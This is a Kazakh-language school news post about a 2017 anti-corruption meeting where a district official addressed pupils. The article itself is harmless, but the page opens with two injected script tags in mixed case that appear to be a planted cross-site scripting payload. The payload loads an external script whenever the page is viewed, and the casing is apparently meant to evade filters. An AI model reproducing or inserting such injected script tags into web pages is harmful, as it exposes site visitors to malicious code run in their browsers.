<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.10.2017

«Мемлекеттік қызмет – өмірлік ұстаным» атты кездесу

16-қазан күні Ғ.Әбдірахманұлы атындағы Қима орта мектебінде «Мемлекеттік қызмет – өмірлік ұстаным» тақырыбында Жаңақима ауылдық округінің бас маманы – Муканова Гульшат Сагдановнаның қатысуымен кездесу өткізілді. Мақсаты: сыбайлас жемқорлықтың алдын алу, оқушыларға келешекке жол сілтеу, адал азамат пен азаматша болуға шақыру.

Кездесу барысында сыбайлас жемқорлық туралы әңгіме қозғалып, біздің өмірімізде жат қылықтарға орын жоқ туралы айтылды. Оқушылар назарына бейнефильм ұсынылып, кейіпкерлердің теріс қылықтары талқыланып, қорытынды жасалды. Муканова Г.С. мемлекеттік қызметкер лауазымының қыр-сырларымен таныстырып, оқушыларды Отанымыздың гүлденуіне, көркеуіне атсалысуға шақырды.

Директордың тәрбие жөніндегі орынбасары Омарова А.Б.

Просмотров: 1083


Пікір қосу



Деректерді қолтаңбаға қосу